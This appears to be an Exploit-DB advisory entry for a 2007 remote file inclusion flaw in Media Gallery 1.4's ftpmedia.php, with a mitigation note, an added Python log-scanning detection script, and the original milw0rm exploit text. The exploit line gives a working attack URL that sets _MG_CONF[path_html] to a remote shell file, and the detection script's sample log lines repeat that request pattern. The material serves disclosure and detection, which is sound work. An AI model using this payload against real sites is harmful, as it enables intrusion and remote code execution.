Vendor: Media Gallery
By: ThE TiGeR
CVSS: 5.5 (MEDIUM)
CWE: Remote File Inclusion
Product Name: Media Gallery
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Media Gallery =>v1.4 Remote file inclusion

This exploit allows remote attackers to include arbitrary files via a specially crafted URL in the _MG_CONF[path_html] parameter in the ftpmedia.php script.

Mitigation:

Apply the latest patch or upgrade to a newer version of Media Gallery.
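
A detection sketch for the request pattern described above, added here as an example and not part of the original advisory: it scans web server access logs (Combined Log Format is assumed) for requests to ftpmedia.php that set any _MG_CONF[...] key in the query string, and notes whether the value is a remote URL. The log lines, IP addresses and host names are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client IP, request target and status from a Common/Combined Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# A value starting with scheme:// (http://, ftp://, ...) points off-host.
REMOTE_RE = re.compile(r'^\s*[a-z][a-z0-9+.-]*://', re.I)


def classify(line):
    """Return a dict for a request that sets _MG_CONF[...] on ftpmedia.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.lower().endswith("/ftpmedia.php"):
        return None
    # parse_qsl percent-decodes keys and values, so %5B / %5D forms are covered.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        # Configuration entries should never arrive from the client at all.
        if key.lower().startswith("_mg_conf["):
            return {
                "ip": m["ip"],
                "status": int(m["status"]),
                "param": key,
                "remote_value": bool(REMOTE_RE.match(value)),
            }
    return None


def scan(lines):
    """Return the hits found in an iterable of access-log lines."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges and example hosts).
_P = "/mediagallery/public_html/maint/ftpmedia.php"
_T = "[14/May/2007:10:01:02 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {_T} "GET {_P}?_MG_CONF[path_html]=http://files.example.net/a.txt? HTTP/1.1" 200 512',
    f'203.0.113.7 - - {_T} "GET {_P}?_MG_CONF%5Bpath_html%5D=http%3A%2F%2Ffiles.example.net%2Fa.txt HTTP/1.1" 200 512',
    f'198.51.100.4 - - {_T} "GET {_P}?_MG_CONF[path_html]=/var/www/ HTTP/1.1" 200 301',
    f'198.51.100.4 - - {_T} "GET {_P} HTTP/1.1" 302 0',
    f'198.51.100.9 - - {_T} "GET /mediagallery/index.php?page=2 HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Access logs normally record only the request line, so this covers the query string and not the same key sent in a request body.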

Exploit-DB raw data:

#Media Gallery =>v1.4 Remote file inclusion

#Download script : http://switch.dl.sourceforge.net/sourceforge/mediagallery/mediagallery-1.4.6-1.3.11.tar.gz

#Thanks Str0ke

#Exploit :

#http://victime.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[com]

# milw0rm.com [2007-05-14]